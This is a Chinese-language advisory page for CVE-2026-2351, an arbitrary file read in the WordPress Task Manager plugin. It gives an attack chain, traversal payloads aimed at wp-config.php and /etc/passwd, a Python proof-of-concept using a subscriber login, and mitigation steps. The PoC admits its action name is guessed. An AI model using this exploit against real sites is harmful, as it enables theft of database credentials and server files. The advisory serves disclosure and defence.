CVE-2026-2351 CVSS 6.5 中危

CVE-2026-2351 WordPress Task Manager 任意文件读取漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2351

漏洞类型

任意文件读取

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Task Manager Plugin

漏洞概述

WordPress Task Manager插件在3.0.2及之前的版本中存在任意文件读取漏洞。该漏洞源于`callback_get_text_from_url()`函数，允许拥有订阅者及以上权限的认证攻击者读取服务器上的任意文件内容。攻击者无需用户交互即可通过网络利用此漏洞，可能导致敏感信息泄露。

技术细节

该漏洞位于WordPress Task Manager插件的导入模块中。具体来说，`module/import/action/class-import-action.php`文件中的`callback_get_text_from_url()`函数未能严格验证用户输入的URL或文件路径参数。由于该函数被注册为AJAX回调，且未进行充分的权限校验，导致低权限用户（如订阅者）即可调用。攻击者可以利用此漏洞，通过构造包含恶意路径（如`../../../../wp-config.php`或`file:///etc/passwd`）的请求发送给服务器。服务器处理该请求时，会直接读取并返回指定文件的内容。鉴于CVSS评分为6.5，此漏洞具有较高的机密性影响风险。

攻击链分析

STEP 1

信息收集

攻击者识别出目标网站使用了WordPress，并安装了Task Manager插件（版本<=3.0.2）。

STEP 2

获取凭证

攻击者注册或获取一个低权限账号（订阅者级别），因为漏洞仅需低权限认证。

STEP 3

发送恶意请求

攻击者使用该账号登录，并构造包含恶意文件路径的AJAX请求发送至`/wp-admin/admin-ajax.php`，触发`callback_get_text_from_url`函数。

STEP 4

获取敏感数据

服务器响应请求，返回指定文件（如wp-config.php）的内容，攻击者利用这些信息进一步渗透系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
username = "subscriber"
password = "password"

# 1. Login to get authentication cookies
login_url = "http://example.com/wp-login.php"
session = requests.Session()
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": target_url
}
session.post(login_url, data=login_data)

# 2. Exploit Arbitrary File Read
# The action name is inferred from the function name 'callback_get_text_from_url'
# Common WP pattern: action = function name without 'callback_' prefix
payload_data = {
    "action": "get_text_from_url",
    # Vulnerable parameter, attempting to read wp-config.php
    "url": "/etc/passwd" 
    # Depending on implementation, might need path traversal like "../../../wp-config.php"
}

response = session.post(target_url, data=payload_data)

if response.status_code == 200:
    print("[+] Exploit successful!")
    print("[+] File content:")
    print(response.text)
else:
    print("[-] Exploit failed.")

影响范围

WordPress Task Manager Plugin <= 3.0.2

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Task Manager插件。此外，可以通过服务器配置（如PHP的open_basedir设置）限制文件访问范围，防止读取Web目录之外的敏感文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表